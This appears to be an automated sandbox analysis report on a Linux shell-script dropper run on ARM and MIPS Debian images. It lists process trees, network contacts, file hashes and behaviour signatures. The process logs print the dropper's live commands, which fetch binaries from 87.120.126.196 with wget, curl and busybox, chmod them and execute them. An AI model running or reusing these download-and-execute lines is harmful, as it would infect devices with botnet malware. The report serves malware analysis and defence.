| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
Processes
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/wget
[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 89.187.167.3:443 | | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
debian9-armhf-20240611-en
Max time kernel
33s
Max time network
34s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
| N/A | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | N/A |
| N/A | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
Processes
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:34
Reported
2024-10-28 02:36
Platform
debian9-mipsbe-20240611-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
Processes
/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh
[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |